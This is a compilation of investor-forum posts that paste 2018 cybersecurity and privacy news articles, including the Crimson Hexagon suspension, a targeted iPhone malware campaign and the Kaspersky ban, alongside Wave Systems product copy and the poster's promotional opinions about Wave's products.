Great, Now Facebook Is Investigating Potential Data Misuse by Something Called 'Crimson Hexagon'
Wave's Scrambls could have benefited Facebook and Twitter users in a big way. It could be a great tool for Facebook and Twitter users to 'scrambl' posts for the public that is not part of their inner circle. imo.
https://gizmodo.com/great-now-facebook-is-investigating-potential-data-mis-1827773950
Facebook may have stumbled through its Cambridge Analytica user privacy scandal largely unscathed so far—the yet-to-be-determined outcome of four separate federal investigations notwithstanding—but its pivot to publicly talking a big game on cracking down on data misuse continues.
Now Facebook has suspended another data analysis firm that received user data, this time with a name that sounds suspiciously like an evil corporation from a 1980s-era Kurt Russell movie: Crimson Hexagon. According to the Wall Street Journal, the company has secured at least 22 separate federal contracts since 2014 worth more than $800,000, including for the State Department, the Federal Emergency Management Agency, and the Secret Service, as well as a separate contract with a Russian nonprofit called the Civil Society Development Foundation.
Crimson Hexagon aggregates large amounts of public posts from sites like Facebook and Twitter for purposes like measuring public sentiment around a range of issues, and according to the WSJ, claims to have assembled a trillion-post archive. For example, the paper reported it attempted (but failed) to procure a Defense Department contract monitoring the terror group ISIS online. Its Russian contract was to measure the popularity of Vladimir Putin; another contract in Turkey informed the Recep Tayyip Erdogan-led government’s “decision in 2014 to briefly shut down Twitter amid public dissent,” the WSJ wrote, citing sources familiar with the company.
While the WSJ wrote Facebook is suspending the Boston-based company while it determines whether the government contracts violated its terms, it is not currently believed the firm gained access to private data like Cambridge Analytica:
Crimson Hexagon operates with little oversight from Facebook once it pulls public data from the social-media platform, according to more than a dozen people familiar with the business. The government contracts weren’t approved by Facebook in advance, for example, the people said.
Facebook, in response to questions from The Wall Street Journal this week about its oversight of Crimson Hexagon’s government contracts and storing of user data, said Friday it wasn’t aware of some of the contracts. On Friday, it said it was suspending Crimson Hexagon’s apps from Facebook and its Instagram unit, and launching a broad inquiry into how Crimson Hexagon collects, shares and stores user data.
Also concerning is a 2016 incident in which Crimson Hexagon suddenly began receiving private Instagram posts while downloading public Facebook ones “because of what Crimson Hexagon employees assumed was a software glitch on Facebook’s part”—something that certainly sounds like a major screwup.
Twitter also worked with Crimson Hexagon, the paper wrote. Unlike with Facebook, where data is freely provided to developers, the company paid Twitter for direct access to its “fire hose,” a premium version of its API that guarantees access to all tweets matching specific criteria. That means Crimson Hexagon gets more useful data from Twitter than Facebook, the WSJ added, but Twitter reportedly killed a potential contract with Immigration and Customs Enforcement over concerns on how the data might be used.
Facebook banned the use of its data for government surveillance in March 2017, per the BBC, though Crimson Hexagon’s other deals have included work with Adidas, Samsung, and the BBC itself.
“We don’t allow developers to build surveillance tools using information from Facebook or Instagram,” a Facebook spokesperson told CNN Money. “We take these allegations seriously, and we have suspended these apps while we investigate.”
In a blog post, Crimson Hexagon’s Chris Bingham emphasized that the company only pulls public posts, that government contracts are a minority of its work, that it only uses the data for purposes allowed by platforms, and “under no circumstances is surveillance a permitted use case.”
As noted by TechCrunch, unlike Cambridge Analytica, which worked to obfuscate its connection to a shady network of other companies and allegedly hired foreign contractors to work on US elections in what was possibly an illegal scheme, “Crimson Hexagon is more above the board, with ordinary venture investment and partnerships.”
Mysterious malware campaign targets just 13 iPhones in India
Can there be any doubt that this has occurred or will occur on Android phones as well? Wave Endpoint Monitor could potentially help out in this situation. imo. See previous post below.
https://investorshub.advfn.com/boards/read_msg.aspx?message_id=142196498
https://www.cyberscoop.com/mysterious-malware-campaign-targets-just-13-iphones-india/
An application-warping malware campaign in India is aimed at just 13 iPhones in what researchers are calling a “highly targeted” operation.
The attackers are using an open-source mobile device management (MDM) server to distribute the malware through popular apps like Telegram and WhatsApp, researchers from Talos, Cisco’s threat intelligence unit, revealed Thursday. The use of MDM, a popular enterprise tool for administering mobile apps, allows hackers to control how their malware is interacting with the target phones.
“This campaign is of note since the malware goes to great lengths to replace specific mobile apps for data interception,” researchers Warren Mercer, Paul Rascagneres, and Andrew Williams wrote in a blog post.
The researchers don’t know who was targeted in the campaign, who carried out the attack, or why. While the hackers apparently tried to plant a “false flag” by posing as Russian, evidence suggests they were operating in India, according to Talos.
The malicious code injected into the apps can collect and exfiltrate phone and serial numbers, location, contacts, and Telegram and WhatsApp messages. The iPhone users are likely lured into enrolling in the MDM service through a social engineering campaign, according to the researchers. Each step of the enrollment process requires interacting with the user, such as installing a certificate authority on the iPhone.
Apple has revoked 5 certificates linked with the campaign, according to the researchers.
“The likely use of social engineering to recruit devices serves as a reminder that users need to be wary of clicking on unsolicited links and verify identities and legitimacy of requests to access devices,” they wrote.
The growing use of MDM at large organizations means users need to understand that installing additional certificates on devices can expose them to malicious activity, the researchers advised. “By installing a certificate outside of the Apple iOS trusted certificate chain, you may open up to possible third-party attacks like this,” they added.
It’s an open question as to why the malware, which the researchers say has been in use since August 2015, has gone after just 13 iPhones. Asked about this, a Talos spokesperson said that, for now, the researchers won’t be offering additional information beyond the blog post.
“Over a three-year period, the attackers remained under the radar — likely due to the low number of compromised devices,” the blog post states.
Pay-n-pray cybersecurity isn’t working. What if we just paid when it works?
https://www.digitaltrends.com/computing/bounty-based-cybersecurity-safety/
Not allowing bad guys on the network (see end of post) compared to the norm could be a relief to companies constantly having to put out fires (and potentially miss some) and be proof that Wave's TPM/ERAS product 'perform as designed'. Other Wave products perform better than competitors in the industry and this article discusses pay for performance which seems to be one of Wave's stronger suits. imo. This could change the way companies buy cybersecurity products. With companies spending billions of dollars on cybersecurity, isn't it time they find solutions that work, like Wave Systems' products!
Like home security, people would often rather not think about cybersecurity once they’ve paid for it. They’d rather pay and pray.
But how do you know when a security company’s software is working? With all the billions of dollars poured into protecting ourselves and our businesses online, why do hacks seem to be increasing in regularity and damages?
We spoke with Oren J. Falkowitz, a former senior-level employee at the NSA and United States Cyber Command, who has a radical idea for how cybersecurity companies should be making their money.
The problem
Our modern cybersecurity fiasco has many causes. Maybe it’s a lack of government funding and regulation. Maybe it’s large tech corporations not caring enough about privacy. Maybe it’s just a matter of educating the public and explaining in simple terms what’s at stake.
Falkowitz has a different take. He believes the real problem is that cybersecurity profits aren’t tied to performance. “For us, it means performance-based cybersecurity and paying for results, not a failure,” he told Digital Trends. “Companies should pay for cybersecurity only when and if it performs as designed.”
That’s not how it works today. Cybersecurity experts, companies, and antivirus software are presented and purchased like an insurance plan. You pay monthly and hope that nothing bad happens. If it does, they’ll help you pick up the pieces — and maybe try to upsell you on more security.
Area 1 Security, Falkowitz’s own cybersecurity company, takes the opposite approach. Area 1 calls out the fact that people “commit to security contracts running three to five years, spending six or seven figures. But they still don’t get what they pay for.” Falkowitz believes clients should pay only for attempted crimes that are stopped. It’s an idea similar to bug bounty programs, which encourage hackers to find – and then disclose – vulnerabilities.
“Companies spend about $93 billion on cybersecurity, with no end in sight, and what’s worse, no end to the severity or frequency of cyber attacks,” Falkowitz said. “Performance-based and accountable cybersecurity will ensure that results are what drive the future innovations and successful outcomes in business models.”
You might wonder how a company could stay in business if it constantly had to prove to customers that attacks are being stopped. Area 1 Security makes it work by focusing its efforts on a particular aspect of cybersecurity — phishing.
It all leads back to phishing
“Phishing is the attack that starts the attack, it’s the root cause for an astounding 95 percent of all damages,” said Falkowitz. “The key to performance-based cybersecurity is stopping phishing.”
Phishing has become the bane of the internet’s existence. From malware to stolen data, phishing is often the entry point for the worst cyberattacks we’ve seen. It usually takes the form of a fraudulent email, sent to an unsuspecting victim under the guise of an official company or organization.
The email will then prompt the reader to click a link — and once they do, the attacker’s trap is triggered. Though simple, hackers have used phishing for everything from the Clinton campaign email debacle to the devastating 2017 WannaCry ransomware attack.
“Phishing is a socially-engineered attack that relies on authenticity to evade detection,” Falkowitz explained. “It’s designed not to be caught by anyone! That’s why it works so well. Besides being effective, it’s also incredibly cheap. That’s part of why it’s so good economically to be a bad guy on the internet. If you’re an attacker and you have something that works, that most companies can’t defend against, why not keep using it?”
Area 1 Security’s system claims to stop 99.99 percent of all phishing attacks, allowing them to keep a log of the attacks they’re preventing. Its philosophy isn’t to hunt down the criminals across the internet, but instead to stop the ones who are already knocking at our doors.
“Until we take phishing as a weapon out of the hands of attackers, we’ll continue on this increasingly dangerous and expensive trajectory.”
Maybe it’s time we started asking more from the companies that claim to protect us. After all, disarming the bad guys sounds like a much better plan than waiting for them to attack.
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
Microsoft, Google, Facebook, Twitter Announce "Data Transfer Project"
The profiles mentioned in the article could be stored in the TPM and maybe somewhat similar to the OneName/Wave agreement way back in 2000 except TPMs are ubiquitous now. It seems that the 'Trust at the Edge' of the network paradigm could work more effectively in this situation now that TPMs are ubiquitous!
https://www.bleepingcomputer.com/news/technology/microsoft-google-facebook-twitter-announce-data-transfer-project/
Facebook, Google, Microsoft, and Twitter have announced on Friday, July 20, the Data Transfer Project (DTP), an initiative to create an open-source, service-to-service data portability platform so that users of their sites and others can easily migrate data from one platform to another.
After open-sourcing the code, the four tech giants hope that other platforms will adopt their new technology and help create an interconnected web where users can easily move data from platform to platform without headaches and avoid situations where they have to set up profiles over and over and over and over again at each site they register.
But the DTP framework is also useful for other things. For example, the four companies say, it could be leveraged to build tools and software to extract and back up data stored in social media profiles, or for creating tools that wipe out a user's social presence.
DTP leverages existing APIs
According to a scientific paper the four companies working on DTP released yesterday, the DTP framework will work on existing APIs and authorization mechanisms to access and convert data into a common format and will require minimal modifications from participants.
Security features are baked in, and a governance body will also be created to oversee the framework's future development.
The DTP framework's source code is available on GitHub.
DTP already supports a few export types, online platforms
"Our prototype already supports data transfer for several product verticals including: photos, mail, contacts, calendar, and tasks. These are enabled by existing, publicly available APIs from Google, Microsoft, Twitter, Flickr, Instagram, Remember the Milk, and Smugmug," said Brian Willard, Software Engineer and Greg Fair, Product Manager at Google.
"For people on slow or low bandwidth connections, service-to-service portability will be especially important where infrastructure constraints and expense make importing and exporting data to or from the user’s system impractical if not nearly impossible," said Craig Shank, Vice President for Corporate Standards at Microsoft.
"These are the kinds of issues the Data Transfer Project will tackle. The Project is in its early stages, and we hope more organizations and experts will get involved," said Steve Satterfield, Privacy & Public Policy Director at Facebook.
"This will take time but we are very excited to work with innovators and passionate people from other companies to ensure we are putting you first," said Damien Kieran, Data Protection Officer at Twitter.
How Web Authentication May Change the Future of Passwords
Shouldn't Web Authentication or similar products have the premier TPM management company (Wave) and its product ESC/ETS used to help manage the TPM?
https://www.programmableweb.com/news/how-web-authentication-may-change-future-passwords/how-to/2018/07/19
Using WebAuthn or Web Authentication, clients can be verified with their phones, hardware keys, or trusted devices. In his article, Nick Steele explains the new standards in web authentication, followed by registration and authentication where you’ll find PIN and biometrics access methods, then he comments on how web browsers use a credential manager API.
Web Authentication
Trusted platform module devices that secure hardware through crypto keys and mobile phones are two of the many ways to authenticate via the web. Users can be authorized by fingerprints with biometric verification, although additional bio methods exist like retina and iris patterns, hand geometry, earlobe geometry, voice waves, and DNA. When a customer is accessed via web, passwords no longer will be necessary.
Registration
When a user registers, the created credential confirms to the web app owner that access is granted. This method replaces ordinary U2F cases, in which one security key instantly validates user presence. U2F is used by Facebook, Gmail, Dropbox, Salesforce.com, and GitHub. Think about the times when you’ve confirmed identity to Gmail by entering a number they send you via text message on your phone.
The author clarifies registration with an example: A user visits the website cat-facts.com from a laptop, registering for an account. By pressing the registration button, a prompt on their phone says “Register with cat-facts.com.” When they accept the request, the user could use a PIN or a biometric action (like a fingerprint) that will be linked to the created account. This action will display a confirmation: “Registration complete!” This user is now registered and the system has recorded the authorization gesture for future access.
The same image the author shares makes me think of my phone when I download an app from the App Store.
Authentication
The credential created by the user is a keypair, a public key associated to a private key. The device the user is trying to authenticate will send verification data to prove user identity. When the user confirms presence, the data will be returned signed by the credential private key, authenticating the user to the device.
To demonstrate WebAuthn, let’s imagine a user registered a second account at the site example.com and the person is browsing on a phone. As the user types the address example.com, the option to log in is chosen and two accounts will be displayed. The user will select the account and then be prompted to enter a PIN or a biometric authentication linked to the account.
Credential manager API and… the end of passwords?
WebAuthn aims to provide unique biometric multi-factor authentication, like a fingerprint from a smartphone, voice, or retina. Eye verification would be from a short range distance, although an iris scanner that captures an eye from 40 feet away has already been developed by the Carnegie Mellon University College of Engineering. The idea is to authenticate with particular traits to increase security and replace passwords.
WebAuthn currently only supports two-factor authentication that in most cases include username and password in addition to authentication via smartphone. If a biometric verification is not accessible, entering a PIN can work because still, it will be browser-protected by Google, Microsoft, and Firefox. Verification stored by browsers could be handled by a Credential Manager API that Google uses in Chrome. As W3 defines, the API enables a website to request a user’s credentials from a user agent, helping the user agent correctly store user credentials for future use.
The end of passwords is not near yet. The author predicts Firefox and Google could release the WebAuthn API within the next months.
He has developed a web app in Go hosted on GitHub to demonstrate how WebAuthn registration and authentication work. You can try out the code via webauthn.io using a Firefox Nightly build.
https://www.wavesys.com/products/embassy-security-center
This puts the endpoint in endpoint security
A key piece of the Wave alternative, Wave’s EMBASSY® Security Center is what lets you manage all the functions of your Trusted Platform Modules (TPMs) and self-encrypting drives (SEDs)—hardware security features already embedded in most business-class PCs and tablets. When installed on each of your desktops, laptops, tablets, and so on, this feature-rich software carries out the commands you issue remotely with our EMBASSY server products.
Key Features:
Easy security compliance
• When your endpoints are secure and reporting is in place, you’ve got compliance covered
Data protection
• Configure your VPN so that only authorized machines can access it from the outside
• Multi-factor authentication options include any combination of individual passwords, a master password, biometrics, smart cards, or a TPM PKI certificate
• Easy backup and recovery of TPM keys in case of malfunction of the TPM, motherboard, or hard drive
• Enables hardware-based pre-boot authentication to the encrypted hard drive (if equipped)
Simplicity
• Central management of security policies at the machine and user levels via our EMBASSY Remote Administration Server
• Deploy TPMs from multiple manufacturers using a single management system
• Deploy SEDs in minutes that integrate seamlessly with single sign-on (SSO) to Windows and Windows password synchronization
No compromises
• More security without more passwords to remember
• Your devices will perform just the same—our software makes them safer, not slower
Windows 8 Compatibility
• Compatible with Windows 8.1, 8, 7 and Vista operating systems – manage mixed environments from one console
• ESC supports Windows 8 Pro & Enterprise tablets so the same tools can secure all your enterprise endpoints
Application development
• Accelerate your application development, determine compatibility of your application and the TPM by using Wave’s Cryptographic Service Provider or Key Storage Provider, both included with the Embassy Security Center
Only 20% of companies have fully completed their GDPR implementations
https://www.helpnetsecurity.com/2018/07/16/complete-gdpr-implementation/?utm_source=twitter&utm_medium=social&utm_campaign=corpcomms&utm_content=industry-news
Key findings from a survey conducted by Dimensional Research highlight that only 20% of companies surveyed believe they are GDPR compliant, while 53% are in the implementation phase and 27% have not yet started their implementation.
EU (excluding UK) companies are further along, with 27% reporting they are compliant, versus 12% in the U.S. and 21% in the UK. While many companies have significant work to do, 74% expect to be compliant by the end of 2018 and 93% by the end of 2019.
While many companies still have a long way to go, a comparison to August 2017 research shows significant progress in the past ten months. The number of companies whose GDPR implementation is under way or completed increased from 38% to 66% in the U.S. and from 37% to 73% in the UK.
The cost of compliance is high
• 27% of companies spent over half a million dollars each to become GDPR compliant
• 31% of companies plan to spend over half a million dollars each on GDPR compliance efforts between June and December 2018
• 18% of US companies spent over 1 million dollars each on compliance versus 8% for UK and 8% for EU companies.
Most companies are positive about GDPR
Despite difficulties in becoming GDPR compliant, 65% view GDPR as having a positive impact on their business. Only 15% view the GDPR as having a negative impact on their business.
Customer expectations and complexity top GDPR drivers
• Meeting customer expectations (57%) was the main driver to become compliant, significantly higher than concern for fines (39%)
• Complexity of GDPR posed the biggest challenge to compliance.
GDPR will continue to drive privacy investments
• 87% indicate that data privacy will become more important at their companies after the GDPR deadline
• 80% of companies plan to increase their spending on GDPR technology and tools to maintain compliance.
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Enterprises choose Wave to manage SEDs
Why? From our single console, you can manage all your organization’s self-encrypting drives (SEDs) easily and remotely, whether they number in the hundreds, or hundreds of thousands.
SEDs are the most secure, best-performing and most transparent encryption option for protecting data on laptops. These drives automatically encrypt all data written to the drive, so you don’t have to decide what’s important enough to encrypt. They also perform this encryption in the hardware of the drive, so you don’t end up with the performance issues software full-disk encryption is infamous for. SEDs are available as HDD or SSD, and are sold by most major drive manufacturers.
Wave’s management solution delivers remote drive initialization, user management, drive locking, user recovery and crypto-erase for all Opal-based, proprietary and solid-state SEDs.
Easy proof of compliance
Your encryption is only as good as you can prove it to be. To comply with most data protection regulations, your organization has to prove encryption was in place at the time of a potential breach. Wave provides secure audit logs to help you demonstrate compliance.
If you lose a device with a Wave-managed SED, there’s no wondering or guessing. You know encryption was on by default, and you can prove it.
No vendor lock-in
SED technology was created and standardized by a consortium of the best in the infosec industry, a standards body called the Trusted Computing Group (TCG). This means you can buy your drives wherever you want, from whatever vendor you want—any SED built to the TCG’s Opal specification can be managed by Wave.
No SEDs yet? No problem.
If your organization hasn’t yet deployed SEDs, you can skip the process of retro-fitting and simply incorporate SEDs on all new laptops as part of your regular refresh cycle. In the meantime, the same Wave console can manage BitLocker and SEDs, so you can protect the devices you have now with BitLocker and add those with SEDs as they are deployed. And if you’re using Wave’s cloud platform, you can also support OSX FileVault2.
Pick your platform
Wave SED management is available via the cloud or on-premise servers. Ask us for more details about which platform is right for your deployment.
https://www.wavesys.com/products/wave-virtual-smart-card
Wave could have a big impact in getting companies GDPR compliant. imo.
If Your Weapons Aren’t Cyber-Hardened, Expect to Lose Pentagon Contracts
https://www.defenseone.com/business/2018/07/if-your-weapons-arent-cyber-hardened-expect-lose-pentagon-contracts/149783/
The Pentagon intends to start assessing its weapons’ resistance to hacks, instead of leaving that to manufacturers.
FARNBOROUGH, UK — The Pentagon could stop awarding contracts to companies whose weapons are deemed vulnerable to cyber attacks, according to senior U.S. Defense Department officials.
Today, companies are responsible for assessing whether their own products meet DoD cybersecurity standards.
“Because of a couple recent events, we realized that that is not good enough,” Kevin Fahey, the assistant secretary of defense for acquisition, said Monday during a briefing at the Farnborough Air Show.
In February, Deputy Defense Secretary Patrick Shanahan issued a stern warning to companies: protect your networks or risk losing business. In June, Chinese hackers allegedly stole sensitive submarine warfare information from a contractor’s computer.
Officials from the Pentagon’s acquisition, intelligence, chief information officer and research-and-engineering offices are creating a way to test the cyber defenses of weapons when assessing bids from companies. The effort is called “Delivered Uncompromised.”
“If you think about our weapon systems today, the IT infrastructure is a part of our weapon system,” Fahey said.
MITRE Corp., a research-and-development firm, conducted a study, which is “the baseline of where we’re starting from,” Fahey said after the briefing.
The MITRE report noted supply chain vulnerabilities, according to a person familiar with its findings, and made a series of recommendations, including making cyber hardening a “fourth pillar” of acquisition, along with cost, schedule and past performance.
The Pentagon has taken a number of steps in recent months to tighten its cyber defenses. In February, the Defense Science Board made a series of recommendations to improve the way the Pentagon buys software. Two months later, Ellen Lord, the undersecretary for acquisition and sustainment, tapped Jeff Boleng — a former Air Force cybersecurity operations officer — as her special assistant for software acquisition. The Pentagon is also assessing the cyber vulnerabilities of its weapons and infrastructure. The efforts are all intertwined, according to a source with insight into the projects.
“We have to develop a way that we evaluate people’s capability in cyber security almost as a go, no-go versus it’s a comparison between cost, schedule and performance and cyber,” Fahey said after the roundtable. “Cost, schedule, performance always end up being one, two and three [in terms of priority] and then if you’re the fourth, you’re not that important.”
Officials are considering using a grading system for cyber standards that is similar to the way it assesses the maturity of software. They are also considering creating “red teams” that would test contractors’ cyber defenses. Another consideration is offering contractors government-certified cyber tools.
“We know it’s really serious now that we need to make that as a priority and then figure out how do we help the small businesses,” Fahey said. “One of the ideas is almost us maybe being able to deliver them the IT infrastructure as [government furnished equipment] that is cyber secure. That is a high priority across the department.”
Today companies have to declare that they comply with federal acquisition regulations, “but we really don’t check it,” Fahey said. If a company does not meet the standards, it’s not a condition that could prevent them from being awarded a contract. “You just have to come up with a plan on how you’re going to meet it,” he said.
Officials believe that requiring cyber hardening as part of a weapon competition will force companies to better protect their systems.
“If it becomes a competitive differentiator, then what ends up happening is you’ve got every incentive in the world to meet that standard and to use it because it’s something that you need to be successful,” Eric Chewning, deputy assistant secretary of defense for manufacturing and industrial base policy, said in an interview.
Said Fahey: “The only way you make it serious to industry is you make it part of the competition.”
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Secure device & user authentication
Sometimes it feels like security is more effective at deterring your users than hackers. But you still have to protect your enterprise resources, and we’re here to help. We take pride in securing your network, data, and resources to an unprecedented level, without causing a revolt from either IT or your users. In fact, your users probably won’t even know we’re there.
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
Less Than Half of Cyberattacks Detected via Antivirus: SANS
See previous post for relevant information on Wave Endpoint Monitor. With so many companies still using traditional antivirus, it would seem that a product like WEM could be just what these companies need.
https://www.darkreading.com/endpoint/less-than-half-of-cyberattacks-detected-via-antivirus-sans/d/d-id/1332309?_mc=KJH-Twitter-2018-07
Companies are buying next-gen antivirus and fileless attack detection tools but few have the resources to use them, researchers report.
Businesses are investing in more advanced endpoint security tools but don't have the means to properly implement and use them, according to a new report from the SANS Institute.
The SANS 2018 Survey on Endpoint Protection and Response polled 277 IT professionals on endpoint security concerns and practices. In this year's survey, 42% of respondents reported endpoint exploits, down from 53% in 2017. However, the number of those who didn't know they had been breached jumped from 10% in 2017 to 20% in 2018.
Traditional tools are no longer sufficient to detect cyberattacks, the data shows: Antivirus systems only detected endpoint compromise 47% of the time; other attacks were caught through automated SIEM alerts (32%) and endpoint detection and response platforms (26%).
Most endpoint attacks are intended to exploit users. More than 50% of respondents reported Web drive-by incidents, 53% pointed to social engineering and phishing attacks, and half cited ransomware. Credential theft was used in 40% of compromises reported, researchers state.
The majority (84%) of endpoint breaches involve more than one device, experts report. Desktops and laptops are still the top devices of concern, but attackers are also compromising server endpoints, cloud-based endpoints, SCADA, and other industrial IoT devices. Cloud-based endpoints are increasingly popular, going from just over 40% in 2017 to 60% in 2018.
Given the commonality and effectiveness of user-targeted attacks, it's worth noting that detection technologies designed to look at user and system behavior, or provide context awareness, were less involved in detecting breaches. Only 23% of breaches were found with attack behavior-modeling and only 11% were detected with behavior analytics.
Businesses aren't using these technologies as often because they lack the means, SANS reports. Many IT and security pros report investing in next-gen capabilities but not installing them. For example, half have acquired next-gen AV tools but 37% have not implemented them. Forty-nine percent have fileless attack detection tools but 38% haven't implemented the tech.
When breaches do occur it seems many businesses can trace them to the source. Nearly 80% of respondents report they can tie a user to endpoints and servers at least half the time (34% always, 45% at least half), which adds an identity when making decisions about user behavior.
Data collection makes a major difference in data breach remediation, but organizations don't always have access to the data they needed. Most (84%) respondents want more network access and user data, 74% want more network security data from firewall/IPS/unified threat management systems, and 69% want better network traffic analysis.
Government’s Kaspersky Ban Takes Effect
The government should look to have a better malware defense by incorporating Wave Endpoint Monitor. imo. Having Kaspersky banned should put more emphasis on using better anti-malware products like WEM. If only the right people really knew about WEM and other Wave products.
https://www.nextgov.com/cybersecurity/2018/07/governments-kaspersky-ban-takes-effect/149758/
Pentagon, GSA and NASA contracts will now officially prohibit Kaspersky software.
A new procurement rule took effect Monday barring the Russian anti-virus company Kaspersky Lab or any of its partners or distributors from contracts at the Pentagon, General Services Administration or NASA, despite a last-minute Kaspersky effort to halt the ban.
Kaspersky told a federal appeals court last week that the ban would cause the company “reputational and financial damage” and asked the court to temporarily halt the ban while it considers Kaspersky’s underlying legal challenge.
The U.S. Court of Appeals for the D.C. Circuit denied that request late Friday. The one-sentence ruling stated Kaspersky had “not satisfied the stringent requirements for an injunction pending appeal.”
The December 2017 congressional ban was sparked by intelligence agencies’ allegation that Kaspersky executives are too closely tied to the Kremlin and the Homeland Security Department’s conclusion that a Russian cybersecurity law might compel Kaspersky to help Russian intelligence agencies spy on the U.S. government.
Kaspersky has consistently denied any undue influence by the Kremlin and said the Homeland Security Department is misreading the Russian law.
Kaspersky told Nextgov in a statement that the company “is disappointed that the appellate court did not grant the company’s motion to stay … but remains hopeful that the court will find the law unconstitutional after full consideration of the case on the merits.”
Kaspersky’s broad legal argument against the U.S. ban is that Congress unfairly singled it out for punishment without sufficient legal process—what’s called a “bill of attainder.” A U.S. district court judge dismissed that claim in May, saying Congress’s goal was to protect national security, not to punish Kaspersky.
That’s the ruling Kaspersky is appealing.
Kaspersky software has already been scrubbed from all civilian government systems because of a separate ban imposed by Homeland Security in October. Government lawyers argued that meant it was pointless to stall the congressional ban because it would have no practical effect.
Kaspersky disputed that claim in its unsuccessful argument to the appeal court. Putting the congressional ban into effect will damage Kaspersky’s reputation—and its U.S. private-sector sales—even if the ban itself doesn’t lose the company any business, the motion said.
Kaspersky and the government are scheduled to make oral arguments in the case in September.
Congress is likely to enact similar governmentwide contracting bans targeting the Chinese companies Huawei and ZTE in the 2019 version of an annual defense policy bill that’s currently being squared away by a House-Senate conference committee.
The White House has proposed legislation that would make such bans easier in both civilian and defense agencies.
https://www.wavesys.com/malware-protection
Excerpts:
Software can’t always detect malware
The big problem with malware is that antivirus software doesn’t always detect it. Anti-malware software is based on signatures of known bad software. However, there always needs to be a patient zero who discovers he is infected for the rest of the world to benefit from it. In the case of APTs (Advanced Persistent Threats), your organization may be the only target for the specific strain of malware. In that case, the signature detection process will not protect you. Modern anti-malware and other software packages that promise cyber security or protection from APTs use various heuristics and "AI" (Artificial Intelligence) to detect malware based on a predefined set of behavioral parameters. A sophisticated attacker is able to fine-tune the behavior of the malware he is writing against various known anti-malware software solutions, so that it can evade detection for long periods of time.
A further challenge for anti-malware software is that it commonly works at the OS level. It isn’t very good at seeing deeper into the system, where some malware lives. Malware can hide from anti-malware by feeding it false results as it lies lower in the stack.
The extent of APTs seems wider each week. News stories about targeted attacks on organizations appear weekly. Even more stories do not appear, as some malware is not detected for very long periods of time. Some malware described as "cutting edge" has code components that have been available for 3 and 4 years, thus dating their undetected time of life in the wild. With online tools, even a non-technical person can create one easily. And there are more ways than ever for malware to spread: the Internet, personal computing devices, downloads, email, social media sites. Government agencies recognize it as a growing threat. Early detection is the highest priority in this cyberwar. In 2011 NIST published guidelines for establishing a chain of trust for the basic input/output system (BIOS), which initializes a computer when it boots up. This critical system is one of malware’s more consequential targets and an area specifically protected by Wave Systems in its products and in its thinking.
Wave’s solution: start with the device
If antivirus software doesn’t work, what does? The Wave alternative relies not on superficial layers of software but on standards-based hardware: self-encrypting drives (SEDs) and Trusted Platform Modules (TPMs), or security chips, that are already embedded in many of your computers and mobile devices. This hardware provides you with secure storage. When you turn the SED and TPM on and manage them with Wave, you suddenly have a broad, deep view into your network. Among other things, you’ll know immediately whether any one of your devices—computers, laptops, tablets, smartphones—has been tampered with. But Wave is proactive too: you can block the kinds of behaviors that invite malware in. Wave's Endpoint Monitor provides early detection for these low-lying sneaky attacks.
Which other attack vector should you watch? One common vector that is used to attack even the most secure networks is physical devices – connected to USB, FireWire or SD. Our Data Protection Suite AV scanner allows you to block any unscreened device from connecting to any machine in the organization, until it has been scanned for known malware.
U.S. intelligence chief lays out threats to U.S. infrastructure, efforts to protect it.
The government hasn't opted for 'The Wave alternative' as part of its cybersecurity protection, and it seems like this is a missing link in its cybersecurity strategy.
https://www.wavesys.com/solutions
The Wave alternative is to start with the device. The security is built in—part of the hardware—not added on. With the device as your foundation, you have unprecedented yet straightforward control over exactly who has access to your data, with what devices, over what networks, which eliminates much of that complexity, stress, and expense. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
https://www.cyberscoop.com/dan-coats-hudson-institute/?utm_campaign=CyberScoop%20-%20Editorial&utm_content=74346921&utm_medium=social&utm_source=twitter
The top U.S. intelligence official painted a grim picture on Friday of the many types of cyber threats the U.S. faces across critical infrastructure sectors and highlighted the ways the government is countering them.
“These attacks come in different forms. Some are tailored to achieve very tactical goals, while others are implemented for strategic purposes, including the possibility of a crippling cyber attack against our critical infrastructure,” said Director of National Intelligence Dan Coats, speaking at the Hudson Institute, a Washington, D.C. think tank.
“But all of these desperate efforts share a common purpose to exploit America’s openness in order to undermine our long-term competitive advantage.”
Coats said that U.S.’s digital infrastructure is under constant attack from foreign entities including China, Iran and North Korea, but he singled out Russia as the “most aggressive” one, highlighting the country’s reported efforts to use hacking and information campaigns to influence U.S. elections.
The director sought to clarify recent comments from a top DHS official, that suggested that the intelligence community has seen a decline in intent from Russia to interfere in future elections.
“I think there may have been some confusion on what we were seeing now compared to what we saw in 2016 because the Department of Homeland Security noted we are not yet seeing the kind of electoral interference in specific states and in voter databases that we experienced in 2016,” Coats said. “We are just one click of the keyboard away from a similar situation repeating itself.”
Coats’ talk took place within hours of the Department of Justice announcing new indictments of 12 Russian intelligence officers for allegedly hacking into the Democratic National Committee and other election-related entities in the run-up to the 2016 election.
But Coats also warned against having tunnel vision focused on the elections, noting that foreign actors continually target other aspects of U.S. critical infrastructure.
“DHS and FBI, in coordination with international partners, detected Russian government actors targeting government and businesses in the energy, nuclear, water, aviation, and critical manufacturing sectors. The warning signs are there. The system is blinking and it is why I believe we are at a critical point,” he said.
A silver lining that Coats pointed out is that the intelligence community is more integrated and better at sharing information across the 16 agencies that make it up than in past years. However, he said, challenges remain when it comes to coordination between the IC and the private sector organizations that are tapped into the threats U.S. infrastructure faces.
“The respective self-interest of the government, the private sector and the public have created independence rather than complementary lines of effort and awareness,” Coats said. “Everyone, if we are to succeed in dealing with this threat, must take ownership of the challenge.”
Coats noted that in order to actively counter the threats the country faces, President Donald Trump has authorized several actions, including attribution, criminal indictments and economic sanctions – all of which the administration has recently used.
